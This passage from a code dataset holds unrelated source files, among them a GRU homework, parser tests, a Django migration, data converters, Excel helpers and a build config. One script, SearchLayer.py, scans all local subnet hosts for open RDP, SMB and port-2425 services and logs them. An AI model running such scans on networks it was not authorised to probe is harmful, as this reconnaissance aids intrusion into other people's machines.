DELETE\n def __init__(self, in_feature, out_feature):\n self.in_feature = in_feature\n self.out_feature = out_feature\n\n self.W = np.random.randn(out_feature, in_feature)\n self.b = np.zeros(out_feature)\n \n self.dW = np.zeros(self.W.shape)\n self.db = np.zeros(self.b.shape)\n\n def __call__(self, x):\n return self.forward(x)\n\n def forward(self, x):\n self.x = x\n self.out = x.dot(self.W.T) + self.b\n return self.out\n\n def backward(self, delta):\n self.db = delta\n self.dW = np.dot(self.x.T, delta)\n dx = np.dot(delta, self.W.T)\n return dx\n\n\n\nclass GRU_Cell:\n \"\"\"docstring for GRU_Cell\"\"\"\n def __init__(self, in_dim, hidden_dim):\n self.d = in_dim\n self.h = hidden_dim\n h = self.h\n d = self.d\n self.x_t=0\n \n self.Wzh = np.random.randn(h,h)\n self.Wrh = np.random.randn(h,h)\n self.Wh = np.random.randn(h,h)\n \n self.Wzx = np.random.randn(h,d)\n self.Wrx = np.random.randn(h,d)\n self.Wx = np.random.randn(h,d)\n \n self.dWzh = np.zeros((h,h))\n self.dWrh = np.zeros((h,h))\n self.dWh = np.zeros((h,h))\n \n self.dWzx = np.zeros((h,d))\n self.dWrx = np.zeros((h,d))\n self.dWx = np.zeros((h,d))\n \n self.z_act = Sigmoid()\n self.r_act = Sigmoid()\n self.h_act = Tanh()\n \n # Define other variables to store forward results for backward here\n self.h_1 = 0 #to store h-1 in forward\n\n\n def init_weights(self, Wzh, Wrh, Wh, Wzx, Wrx, Wx):\n self.Wzh = Wzh\n self.Wrh = Wrh\n self.Wh = Wh\n self.Wzx = Wzx\n self.Wrx = Wrx\n self.Wx = Wx\n\n def __call__(self, x, h):\n return self.forward(x,h)\n\n def forward(self, x, h):\n \t# input:\n # - x: shape(input dim), observation at current time-step\n # - h: shape(hidden dim), hidden-state at previous time-step\n # \n # output:\n # - h_t: hidden state at current time-step\n #sigmoid = Sigmoid()\n #tanh = Tanh()\n \n self.h_1 = h #to store h-1 in forward\n self.x_t = x # to store x in forward\n\n self.z1 = self.Wzh.dot(h)\n self.z2 = self.Wzx.dot(x)\n self.z3 = self.z1 + self.z2\n self.z4 = self.z_act(self.z3) # self.z4 is zt\n\n self.z5 = self.Wrh.dot(h)\n self.z6 = self.Wrx.dot(x)\n self.z7 = self.z5 + self.z6\n self.z8 = self.r_act(self.z7)\n\n self.z9 = self.z8*h\n self.z10 = self.Wh.dot(self.z9)\n self.z11 = self.Wx.dot(x)\n self.z12 = self.z10 + self.z11\n self.z13 = self.h_act(self.z12)\n\n self.z15 = 1-self.z4\n self.z16 = self.z15*h\n self.z17 = self.z4*self.z13\n self.z18 = self.z16 +self.z17\n h_t = self.z18\n\n\n return h_t\n\n\n # This must calculate the gradients wrt the parameters and returns the derivative wrt the inputs, xt and ht, to the cell.\n def backward(self, delta):\n \t# input:\n # - delta: shape (hidden dim), summation of derivative wrt loss from next layer at\n # the same time-step and derivative wrt loss from same layer at\n # next time-step\n # output:\n # - dx: Derivative of loss wrt the input x\n # - dh: Derivative of loss wrt the input hidden h\n dz1 = 0\n dz2 = 0\n dz3 = 0\n dz4 = 0\n dz5 = 0\n dz6 = 0\n dz7 = 0\n dz8 = 0\n dz9 = 0\n dz10 = 0\n dz11 = 0\n dz12 = 0\n dz13 = 0\n dz14 = 0\n dz15 = 0\n dz16 = 0\n dz17 = 0\n dz18 = 0\n\n dh_1 = 0\n dx_t = 0\n\n t1,t2 = deriv(delta, self.z16, self.z17, \"+\")\n dz16 +=t1\n dz17 +=t2\n t1,t2 = deriv(dz17, self.z4, self.z13, \"o\")\n dz4 +=t1\n dz13 +=t2\n t1,t2 = deriv(dz16, self.z15, self.h_1, \"o\")\n dz15 +=t1\n dh_1 +=t2\n dz14 += -dz15 ####\n\n t1 = deriv(dz13, self.z12, self.z12, \"tanh\") # single value\n dz12 += t1\n t1,t2 = deriv(dz12, self.z10, self.z11, \"+\")\n dz10 +=t1\n dz11 +=t2\n t1,t2 = deriv(dz11, self.Wx, self.x_t, \"*\") ########## check if x is self.x\n self.dWx += t1\n dx_t += t2\n t1,t2 = deriv(dz10, self.Wh, self.z9, \"*\") ########## check if x is self.x\n self.dWh += t1\n dz9 += t2\n t1,t2 = deriv(dz9, self.z8, self.h_1, \"o\")\n dz8 +=t1\n dh_1 +=t2\n\n t1 = deriv(dz8, self.z7, self.z7, \"sigmoid\")\n dz7 +=t1\n t1,t2 = deriv(dz7, self.z5, self.z6, \"+\")\n dz5 +=t1\n dz6 +=t2\n t1,t2 = deriv(dz6, self.Wrx, self.x_t, \"*\") ########## check if x is self.x\n self.dWrx += t1\n dx_t += t2\n t1,t2 = deriv(dz5, self.Wrh, self.h_1, \"*\") ########## check if x is self.x\n self.dWrh += t1\n dh_1 += t2\n\n\n\n t1 = deriv(dz4, self.z3, self.z3, \"sigmoid\")\n dz3 +=t1\n t1,t2 = deriv(dz3, self.z1, self.z2, \"+\")\n dz1 +=t1\n dz2 +=t2\n t1,t2 = deriv(dz2, self.Wzx, self.x_t, \"*\") ########## check if x is self.x\n self.dWzx += t1\n dx_t += t2\n t1,t2 = deriv(dz1, self.Wzh, self.h_1, \"*\") ########## check if x is self.x\n self.dWzh += t1\n dh_1 += t2\n return dx_t, dh_1\n\n\ndef deriv(dz, x, y, op):\n\tif op == None:\n\t\treturn dz\n\t# component-wise “schur” multiply (??)\n\telif op==\"o\":\n\t\treturn dz*y.T , dz*x.T\n\t# Matrix multiply. X must be a matrix\n\telif op==\"*\":\n\t\tif y.ndim==1:\n\t\t\ty = y.reshape(-1,1)\n\t\treturn y.dot(dz), dz.dot(x)\n\telif op==\"+\":\n\t\treturn dz, dz\n\telif op==\"-\":\n\t\treturn dz, -dz\n # The following will expect a single argument\n\telif op==\"tanh\":\n\t\ttanh = Tanh()\n\t\treturn dz*(1-tanh(x)*tanh(x)).T\n\telif op==\"sigmoid\":\n\t\tsigmoid = Sigmoid()\n\t\treturn dz*sigmoid(x).T*(1-sigmoid(x)).T\n\t# The jacobian is the full derivative matrix of the sigmoid\t\n\telif op == \"softmax\":\n\t\t##\n\t\t#return dz*Jacobian(sigmoid,x)\n\t\ttemp = dz*sigmoid(x).T*(1-sigmoid(x)).T\n\t\treturn dz*temp #????\n\n\n\n\n# This is the neural net that will run one timestep of the input \n# You only need to implement the forward method of this class. \n# This is to test that your GRU Cell implementation is correct when used as a GRU. \nclass CharacterPredictor(object):\n def __init__(self, input_dim, hidden_dim, num_classes):\n super(CharacterPredictor, self).__init__()\n # The network consists of a GRU Cell and a linear layer \n\n def init_rnn_weights(self, w_hi, w_hr, w_hn, w_ii, w_ir, w_in):\n # DO NOT MODIFY\n self.rnn.init_weights(w_hi, w_hr, w_hn, w_ii, w_ir, w_in) \n\n def __call__(self, x, h):\n return self.forward(x, h) \n\n def forward(self, x, h):\n # A pass through one time step of the input \n raise NotImplementedError\n\n# An instance of the class defined above runs through a sequence of inputs to generate the logits for all the timesteps. \ndef inference(net, inputs):\n # input:\n # - net: An instance of CharacterPredictor\n # - inputs - a sequence of inputs of dimensions [seq_len x feature_dim]\n # output:\n # - logits - one per time step of input. Dimensions [seq_len x num_classes]\n raise NotImplementedError\n","sub_path":"hw3_p1/gru.py","file_name":"gru.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"285024787","text":"import sys\n\nimport pytest\nfrom lxml import etree\n\nfrom sheepdog.utils.transforms import BcrClinicalXmlToJsonParser\nfrom sheepdog.xml import EvaluatorFactory\nfrom sheepdog.xml.evaluators.fields import (\n BasicEvaluator,\n FilterElementEvaluator,\n LastFollowUpEvaluator,\n TreatmentTherapyEvaluator,\n VitalStatusEvaluator,\n)\n\n\n@pytest.mark.parametrize(\"evaluator, expected\", [\n ({}, BasicEvaluator),\n (dict(name=\"filter\"), FilterElementEvaluator),\n (dict(name=\"last_follow_up\"), LastFollowUpEvaluator),\n (dict(name=\"vital_status\"), VitalStatusEvaluator),\n (dict(name=\"treatment_therapy\"), TreatmentTherapyEvaluator),\n])\ndef test_evaluator_factory(xml_fixture, evaluator, expected):\n\n xml = etree.fromstring(xml_fixture)\n nspace = xml.nsmap\n ev = EvaluatorFactory.get_instance(xml, nspace, dict(evaluator=evaluator))\n assert isinstance(ev, expected)\n\n\ndef test_bcr_parsing(xml_fixture):\n\n parser = BcrClinicalXmlToJsonParser(project_code=None)\n parser.loads(xml_fixture)\n\n # 5 nodes expected\n # 1 demographics, 1 diagnosis, 1 exposure, 2 treatment\n assert 5 == len(parser.docs)\n\n nodes_found = 0\n treatment_nodes = 0\n for node_json in parser.docs:\n # assert demographics contents\n if node_json[\"type\"] == \"demographic\":\n assert \"vital_status\" in node_json\n assert node_json[\"vital_status\"] == \"Dead\"\n nodes_found += 1\n elif node_json[\"type\"] == \"diagnosis\":\n assert node_json[\"days_to_last_follow_up\"] == 4549\n nodes_found += 1\n elif node_json[\"type\"] == \"exposure\":\n nodes_found += 1\n elif node_json[\"type\"] == \"treatment\":\n treatment_nodes += 1\n assert nodes_found + treatment_nodes == 5\n assert treatment_nodes == 2\n","sub_path":"tests/unit/xml/test_node_evaluators.py","file_name":"test_node_evaluators.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"537099936","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('museos', '0002_auto_20180514_1300'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comentario',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('comentario', models.TextField(default=b'DEFAULT_VALUE')),\n ('museo', models.ForeignKey(to='museos.Museo')),\n ],\n ),\n migrations.CreateModel(\n name='Seleccion',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('museos_fav', models.ManyToManyField(to='museos.Museo')),\n ('propietario', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.DeleteModel(\n name='Post',\n ),\n ]\n","sub_path":"guiamuseos/museos/migrations/0003_auto_20180518_1128.py","file_name":"0003_auto_20180518_1128.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"185499306","text":"#!/usr/bin/env python WARNING: This is a TTL serial port 3.3 volts!\r\n\r\n#SETUP --------------------------------------------\r\n#this imports the libraries needed\r\nimport serial, time, urllib, urllib2\r\n\r\n#This sets up the serial port ttyAMA0 GPIO. baud rate is the bits per second.\r\nport = serial.Serial(\"/dev/ttyAMA0\", baudrate=2400, timeout=1)\r\n#delay start\r\n\r\n#SEND TO SERVER ----------------------------------\r\ndef send(channel,node,data):\r\n url = 'http://markers.mtaspiring.school.nz/api/marker'\r\n data = {\r\n 'user_id' : '2',\r\n 'node' : node,\r\n 'channel' : channel,\r\n 'latitude' : '',\r\n 'longitude' : '',\r\n 'elevation' : '',\r\n 'data' : data\r\n }\r\n\r\n data_encoded = urllib.urlencode(data)\r\n req = urllib2.Request(url, data_encoded)\r\n response = urllib2.urlopen(req)\r\n #print response.read()\r\n\r\n#READ SERIAL --------------------------------------------\r\nport.flushInput()\r\nwhile True:\r\n try:\r\n rcv = port.readline() #read buffer until cr/lf\r\n if(rcv):\r\n rcv = rcv.rstrip(\"\\r\\n\")\r\n if len(rcv) > 5:\r\n channel,node,data = rcv.split(\",\")\r\n if len(channel) == 1 and len(node) < 3:\r\n print(\"rcv: \" + channel + node + data)\r\n send(channel, node, data)\r\n except ValueError:\r\n #print(\"opps...\")\r\n port.flushInput()\r\n ","sub_path":"MQTTupload/markers1704.py","file_name":"markers1704.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"361225015","text":"#!/usr/bin/python\n\n# Convert SolarEdge inverter performance monitoring data from JSON to CSV\n\nimport getopt\nimport json\nimport sys\n\nfrom seDataParams import *\n\n# file parameters\ninFileName = \"\"\ninvFileName = \"\"\noptFileName = \"\"\nheaders = False\ndelim = \",\"\nwriteMode = \"w\"\ninvSeq = 0\noptSeq = 0\n\ndef openInFile(inFileName):\n if inFileName == \"stdin\":\n return sys.stdin\n else:\n return open(inFileName)\n\n# open the specified input file\ndef openInput(inFileName):\n return openInFile(inFileName)\n\n# close the input file\ndef closeInput(dataFile):\n dataFile.close()\n\n# open in output file if it is specified\ndef openOutFile(fileName, writeMode=\"w\"):\n if fileName != \"\":\n return open(fileName, writeMode)\n\n# open the output files\ndef openOutFiles(invFileName, optFileName):\n invFile = openOutFile(invFileName, writeMode)\n optFile = openOutFile(optFileName, writeMode)\n return (invFile, optFile)\n \n# close output files \ndef closeOutFiles(invFile, optFile):\n if invFile:\n invFile.close()\n if optFile:\n optFile.close()\n\n# write output file headers\ndef writeHeaders(outFile, items):\n outFile.write(delim.join(item for item in items)+\"\\n\")\n\n# write data to output files\ndef writeData(msgDict, invFile, optFile):\n global invSeq, optSeq\n if invFile:\n if headers and (invSeq == 0) and (msgDict[\"inverters\"] != {}):\n writeHeaders(invFile, invItems)\n for seId in msgDict[\"inverters\"].keys():\n invSeq = writeDevData(invFile, invOutFmt, msgDict[\"inverters\"][seId], invItems, invSeq)\n if optFile:\n if headers and (optSeq == 0) and (msgDict[\"optimizers\"] != {}):\n writeHeaders(optFile, optItems)\n for seId in msgDict[\"optimizers\"].keys():\n optSeq = writeDevData(optFile, optOutFmt, msgDict[\"optimizers\"][seId], optItems, optSeq)\n\n# write device data to output file\ndef writeDevData(outFile, outFmt, devDict, devItems, devSeq):\n if outFile:\n outMsg = delim.join([(outFmt[i] % devDict[devItems[i]]) for i in range(len(devItems))])\n devSeq += 1\n outFile.write(outMsg+\"\\n\")\n return devSeq\n\n# get program arguments and options\n(opts, args) = getopt.getopt(sys.argv[1:], \"ad:hi:o:\")\n\ntry:\n inFileName = args[0]\nexcept:\n inFileName = \"stdin\"\nfor opt in opts:\n if opt[0] == \"-a\":\n writeMode = \"a\"\n elif opt[0] == \"-d\":\n delim = opt[1] \n elif opt[0] == \"-h\":\n headers = True\n elif opt[0] == \"-i\":\n invFileName = opt[1]\n elif opt[0] == \"-o\":\n optFileName = opt[1]\n\n# process the data\ninFile = openInput(inFileName)\n(invFile, optFile) = openOutFiles(invFileName, optFileName)\nfor jsonStr in inFile:\n writeData(json.loads(jsonStr), invFile, optFile)\ncloseInput(inFile)\ncloseOutFiles(invFile, optFile)\n \n\n","sub_path":"se2csv.py","file_name":"se2csv.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"213935335","text":"'''\r\nCreated on May 9, 2018\r\n\r\n@author: xuwang\r\n'''\r\nimport cv2\r\nimport argparse\r\nimport os\r\nimport imutils\r\n#------------------------------------------------------------------------\r\nap = argparse.ArgumentParser()\r\nap.add_argument(\"-s\", \"--srcPath\", required=True,\r\n help=\"source image folder\")\r\nap.add_argument(\"-t\", \"--tgtPath\", required=True,\r\n help=\"target folder to save the maker list\")\r\nap.add_argument(\"-a\", \"--angle\", required=True,\r\n help=\"angle to rotate\")\r\nap.add_argument(\"-cp\", \"--cropPercent\", required=True, nargs='+',\r\n help=\"height and width to crop\")\r\nap.add_argument(\"-r\", \"--ratio\", required=True,\r\n help=\"ratio for shrinking\")\r\nargs = ap.parse_args()\r\nworkingPath = args.srcPath\r\ntargetPath = args.tgtPath\r\nang = float(args.angle)\r\ncp = args.cropPercent\r\nr = float(args.ratio)\r\n# print(float(cp[1]))\r\nimageFiles = os.listdir(workingPath)\r\nrgbIm = []\r\nfor im in imageFiles:\r\n if im.find(\".jpg\") != -1:\r\n rgbIm.append(im)\r\n# Detect each individual image\r\nfor imf in rgbIm: \r\n imgFile = cv2.imread(workingPath+\"\\\\\"+imf)\r\n rotated = imutils.rotate(imgFile, ang)\r\n imgCrop = rotated[(int(rotated.shape[0]*(float(cp[0])))):(int(rotated.shape[0]*(float(cp[1])))-1), (int(rotated.shape[1]*(float(cp[2])))):(int(rotated.shape[1]*(float(cp[3])))-1)] \r\n resizedImage = cv2.resize(imgCrop, (int(imgCrop.shape[1] * r), int(imgCrop.shape[0] * r)), interpolation = cv2.INTER_AREA)\r\n print(targetPath+\"\\\\\"+imf)\r\n cv2.imwrite(targetPath+\"\\\\\"+imf, resizedImage)\r\n\r\n","sub_path":"imgCropSave.py","file_name":"imgCropSave.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"294268034","text":"import socket\r\nimport threading\r\nfrom ipPool import ipTableModel\r\n\r\n# 业务逻辑层\r\n# 创建接收路由列表\r\nrouters = []\r\n# 创建互斥锁\r\nlock = threading.Lock()\r\n# 设置需要扫描的端口号列表\r\nport_list = ['3389', '2425', '139']\r\n# 计数器\r\ncount = 0\r\n# 定义查询路由函数 返回更新的数量\r\ndef search_routers(obj):\r\n # 获取本地ip地址列表\r\n local_ips = socket.gethostbyname_ex(socket.gethostname())[2]\r\n # 存放线程列表池\r\n all_threads = []\r\n # 循环本地网卡IP列表\r\n for ip in local_ips:\r\n for i in range(1, 255):\r\n # 把网卡IP\".\"进行分割,生成每一个可用地址的列表\r\n array = ip.split('.')\r\n # 获取分割后的第四位数字,生成该网段所有可用IP地址\r\n array[3] = str(i)\r\n # 把分割后的每一可用地址列表,用\".\"连接起来,生成新的ip\r\n new_ip = '.'.join(array)\r\n # print(new_ip)\r\n # 遍历需要扫描的端口号列表\r\n for port in port_list:\r\n dst_port = int(port)\r\n # 循环创建线程去链接该地址\r\n t = threading.Thread(target=check_ip, args=(new_ip, dst_port) )\r\n t.start()\r\n # 把新建的线程放到线程池\r\n all_threads.append(t)\r\n # 循环阻塞主线程,等待每一字子线程执行完,程序再退出\r\n for t in all_threads:\r\n t.join()\r\n return count\r\n\r\n\r\n# 创建访问IP列表方法\r\ndef check_ip(new_ip, port):\r\n global count\r\n # 创建TCP套接字,链接新的ip列表\r\n scan_link = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n # 设置链接超时时间\r\n scan_link.settimeout(2)\r\n # 链接地址(通过指定我们 构造的主机地址,和扫描指定端口)\r\n result = scan_link.connect_ex((new_ip, port))\r\n #\r\n scan_link.close()\r\n # print(result)\r\n # 判断链接结果\r\n if result == 0:\r\n # 加锁\r\n lock.acquire()\r\n print(new_ip, '\\t\\t端口号%s开放' % port)\r\n IsExist=ipTableModel.Add(new_ip, port)\r\n if(IsExist):\r\n count += 1\r\n routers.append((new_ip, port))\r\n # 释放锁\r\n lock.release()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ipPool/SearchLayer.py","file_name":"SearchLayer.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"350661863","text":"import os\nimport time,re\npath=os.getcwd()\nch1=open(\"char映射.txt\",'r')\nchar1=ch1.readlines()\nf=open(path+\"/name.txt\",'r')\no=open(path+\"/name_反映射.txt\",'w+')\nline = f.readline()\ncharor=[]\nfor cha in char1:\n charor.append(cha[0])\nwhile line:\n tr=False\n data=\"\"\n #line=line.replace('姉','姐').replace('嶺','岭').replace(\"愛\",\"爱\").replace(\"●\",\"我\")\n #line=line.replace(\"●\",\"我\")\n line=line.replace(\"\\n\",\"\")\n for num in range(len(line)):\n if line[num]=='▲':\n tr=bool(1-tr)\n# print(line[num],tr)\n if tr:\n data=data+line[num]\n else:\n try:\n i=charor.index(line[num])\n data=data+char1[i][1]\n# print(data)\n except:\n data=data+line[num]\n line=data+\"\\n\"\n o.write(line)\n line=f.readline()\nf.close()\no.close()\nprint(\"完成\")\n","sub_path":"Text反映射V2.py","file_name":"Text反映射V2.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"74596701","text":"# -*- coding: utf-8 -*-\n# @Time : 19-3-21\n# @Author : hay\nimport csv\nimport xlrd\nimport xlsxwriter\n\n\nclass ExcelBase(object):\n\n wordbokk = None\n\n def open_workbook(self, filename, **kwargs):\n self.wordbokk = xlrd.open_workbook(filename, **kwargs)\n\n def sheet_names(self):\n return self.wordbokk.sheet_names()\n\n def create_xlsx(self, file_name):\n \"\"\"创建并打开一个文件\"\"\"\n return xlsxwriter.Workbook(file_name)\n\n\nclass ExcelEmail(ExcelBase):\n\n sheet = None\n sheets = []\n nrows = 0\n\n def getExcelEmail(self, filename, **kwargs):\n self.open_workbook(filename, **kwargs)\n self.sheets = self.sheet_names()\n ret_email = set()\n for sheet_name in self.sheets:\n sheetObj = self.wordbokk.sheet_by_name(sheet_name)\n self.nrows = sheetObj.nrows\n if self.nrows:\n for row in range(self.nrows):\n rowList = sheetObj.row_values(row)\n for rl in rowList:\n if not isinstance(rl, str):\n continue\n if rl and '@' in rl:\n ret_email.add(rl.lower())\n break\n return ret_email\n\n def getExcelFristSheetDatas(self, filename, **kwargs):\n self.open_workbook(filename, **kwargs)\n self.sheets = self.sheet_names()\n ret_data = []\n if self.sheets:\n sheetObj = self.wordbokk.sheet_by_name(self.sheets[0])\n self.nrows = sheetObj.nrows\n if self.nrows:\n for row in range(self.nrows):\n rowList = sheetObj.row_values(row)\n ret_data.append(rowList)\n return ret_data\n\n def getExcelFristDatasDict(self, filename, **kwargs):\n self.open_workbook(filename, **kwargs)\n self.sheets = self.sheet_names()\n ret_data = {}\n if self.sheets:\n sheetObj = self.wordbokk.sheet_by_name(self.sheets[0])\n self.nrows = sheetObj.nrows\n if self.nrows:\n for row in range(self.nrows):\n rowList = sheetObj.row_values(row)\n try:\n ret_data.update({rowList[0].lower(): rowList})\n except:\n continue\n return ret_data\n\n def getExcelDatas(self, filename, **kwargs):\n self.open_workbook(filename, **kwargs)\n self.sheets = self.sheet_names()\n sheet_dict = {}\n ret_email = []\n for sheet_name in self.sheets:\n sheet_dict.update({sheet_name: []})\n sheetObj = self.wordbokk.sheet_by_name(sheet_name)\n self.nrows = sheetObj.nrows\n if self.nrows:\n for row in range(self.nrows):\n rowList = sheetObj.row_values(row)\n sheet_dict[sheet_name].append(rowList)\n return sheet_dict\n\n\nclass CsvEmail(object):\n\n def readCsv(self, file, encoding=\"utf-8\"):\n try:\n f = open(file, 'r', encoding=encoding)\n return list(csv.reader(f))\n except Exception as e:\n print(e)\n return []\n\n def getCsvFristDatasDict(self, file, encoding=\"utf-8\"):\n rdict = {}\n try:\n f = open(file, 'r', encoding=encoding)\n l = list(csv.reader(f))\n for row in l:\n try:\n rdict.update({row[0].lower(): row})\n except:\n continue\n return rdict\n except Exception as e:\n return rdict","sub_path":"core/excelHelper.py","file_name":"excelHelper.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"419786903","text":"# -*- coding: utf-8 -*-\r\nfrom TuanTuan.TuanTuanApp.models import Lecture\r\nfrom TuanTuan.TuanTuanApp.TextHandler.common import *\r\nfrom TuanTuan.TuanTuanApp.participle import *\r\n########################################################################\r\nclass LectureHandler:\r\n \"\"\"处理讲座消息\"\"\"\r\n\r\n #----------------------------------------------------------------------\r\n def __init__(self, data=[], rawInput='', tags=[]):\r\n \"\"\"Constructor\"\"\"\r\n self.data = data\r\n self.rawInput = rawInput\r\n self.tags = tags\r\n self.nextHandler = None\r\n \r\n #----------------------------------------------------------------------\r\n def handle(self, current=[]): \r\n \"\"\"标记是否需要继续处理\"\"\"\r\n needNextFlag = True\r\n \"\"\"本层进行处理\"\"\"\r\n all_data = Lecture.objects.all()\r\n time = {'start' : [], 'end' : []}\r\n \"\"\"mark用来标记匹配的数量\"\"\"\r\n mark = {'mark' : 0}\r\n mark_title = {'mark' : 0}\r\n mark_site = {'mark' : 0}\r\n mark_time = {'mark' : 0}\r\n \"\"\"尝试获得精确地点,如果是精确地点,则进行精确地点的匹配\"\"\"\r\n accurate_location = get_accurate_location(self.rawInput)\r\n if accurate_location != \"\" and check_same_in_list(['bt', 'sj'], self.tags) == False:\r\n result = match_accurate_location(all_data, accurate_location)\r\n if len(result) != 0:\r\n mark_site['mark'] = len(self.rawInput)\r\n else:\r\n \"\"\"过滤分词结果中的无用部分\"\"\"\r\n filter_keywords_result = filter_keywords(self.data, self.tags)\r\n \"\"\"统计去除无用部分之后的总字数\"\"\"\r\n mark_keywords = get_mark_keywords(filter_keywords_result)\r\n \"\"\"初始化查询结果\"\"\"\r\n query_title = set()\r\n query_site = set()\r\n query_time = set()\r\n \"\"\"首先进行标题的匹配\"\"\"\r\n if check_same_in_list(['dd', 'sj'], self.tags) == False:\r\n query_title = filter_title__contains(all_data, filter_keywords_result, mark_title)\r\n \"\"\"然后进行地点的匹配\"\"\"\r\n if check_same_in_list(['bt', 'sj'], self.tags) == False:\r\n query_site = filter_site__contains(all_data, filter_keywords_result, mark_site)\r\n \"\"\"最后进行时间的匹配\"\"\"\r\n if check_same_in_list(['bt', 'dd'], self.tags) == False:\r\n timeProcess = TimeProcess(words = self.data)\r\n time = time_merge(timeProcess.getTimes())\r\n timeProcess.extraTime(time)\r\n query_time = filter_time(all_data, time)\r\n if len(query_time) != 0:\r\n mark_time['mark'] = len(time['start']) * 4\r\n \"\"\"进行结果的处理,如果标题全部匹配上,只考虑标题,如果地点全部匹配上,只考虑地点\"\"\"\r\n if mark_title['mark'] == mark_keywords and mark_title['mark'] != 0 and len(query_time) == 0:\r\n result = query_title\r\n elif mark_site['mark'] == mark_keywords and mark_site['mark'] != 0 and len(query_time) == 0:\r\n result = query_site\r\n else:\r\n result = query_title & query_site\r\n if len(result) == 0:\r\n result = query_title | query_site\r\n \"\"\"如果检测到有输入时间,则输入的时间一定是用来限制结果的\"\"\"\r\n if len(time['start']) != 0 and len(filter_keywords_result) != 0:\r\n result = result & query_time\r\n if len(time['start']) != 0 and len(filter_keywords_result) == 0:\r\n result = query_time\r\n \"\"\"根据三个部分的mark确定结果的mark\"\"\"\r\n if mark_title['mark'] >= mark_site['mark'] and mark_title['mark'] >= mark_time['mark']:\r\n mark['mark'] = mark_title['mark'] + mark_site['mark'] * 0.2 + mark_time['mark'] * 0.2\r\n elif mark_site['mark'] >= mark_title['mark'] and mark_site['mark'] >= mark_time['mark']:\r\n mark['mark'] = mark_site['mark'] + mark_title['mark'] * 0.2 + mark_time['mark'] * 0.2\r\n else:\r\n mark['mark'] = mark_time['mark'] + mark_title['mark'] * 0.2 + mark_site['mark'] * 0.2\r\n \"\"\"加入返回结果\"\"\"\r\n current.append({\r\n 'name':'Lecture', \r\n 'data':list(result),\r\n 'mark':mark['mark']\r\n })\r\n \"\"\"本层处理完毕,如果有必要,交给下一层处理\"\"\"\r\n if self.nextHandler != None and needNextFlag == True:\r\n return self.nextHandler.handle(current=current)\r\n else:\r\n return current\r\n\r\n","sub_path":"TuanTuan/TuanTuanApp/TextHandler/lecture_handler.py","file_name":"lecture_handler.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"155291920","text":"\"\"\"\nSnagged alot of settings from:\n http://sourceforge.net/apps/trac/xpcc/browser/trunk/scons/arm.py?rev=651\n\"\"\"\nfrom SCons.Script import *\nimport os\nimport re\n\nroot = os.environ.get('GCC_ROOT')\n\nif root != None:\n print(\"Defaulting to configured toolchain location:\" + root)\n TOOLCHAIN_ROOT=root\n TOOLCHAIN_LIBDIR=os.path.join(TOOLCHAIN_ROOT, 'lib/gcc/arm-none-eabi/4.8.3')\n TOOLCHAIN_BINDIR=os.path.join(TOOLCHAIN_ROOT, 'bin')\n CROSS_COMPILE=TOOLCHAIN_BINDIR + '/arm-none-eabi-'\nelse:\n # Grab it from the path\n CROSS_COMPILE='arm-none-eabi-'\n\nOPENCM3_ROOT = os.path.join(Dir('#').abspath, 'libopencm3')\n\nSCM_REVISION = os.popen(\"git rev-parse HEAD\").read().rstrip()\n\nDEFS=['-DSTM32F2',\n '-DBOOTLOADER_MAJOR_VERSION=1', \n '-DBOOTLOADER_MINOR_VERSION=0', \n '-DBOOTLOADER_PATCH_VERSION=3',\n '-DMAJOR_VERSION=1', \n '-DMINOR_VERSION=1', \n '-DPATCH_VERSION=0',\n '-DNDEBUG',\n '-DSCM_REVISION=\\'\"%s\"\\'' % (re.sub(r'(..)', r'\\\\x\\1', SCM_REVISION)),\n '-DPB_FIELD_16BIT=1',\n '-DQR_MAX_VERSION=0']\n\nWARNS=['-Wall',\n '-Wno-sequence-point',\n '-Wextra',\n '-Wformat',\n '-Wformat-nonliteral',\n '-Wformat-security',\n '-Wimplicit-function-declaration',\n '-Winit-self',\n '-Wmultichar',\n '-Wpointer-arith',\n '-Wredundant-decls',\n '-Wreturn-type',\n '-Wshadow',\n '-Wsign-compare',\n '-Wstrict-prototypes',\n '-Wundef',\n '-Wuninitialized',\n '-Werror']\n\ndef load_toolchain():\n env = DefaultEnvironment()\n\n env['CC'] = CROSS_COMPILE + 'gcc'\n env['CXX'] = CROSS_COMPILE + 'g++'\n env['AR'] = CROSS_COMPILE + 'ar'\n env['AS'] = CROSS_COMPILE + 'g++' \n env['OBJCOPY'] = CROSS_COMPILE + 'objcopy'\n env['OBJDUMP'] = CROSS_COMPILE + 'objdump'\n env['LINK'] = CROSS_COMPILE + 'gcc'\n env['OBJPREFIX'] = ''\n 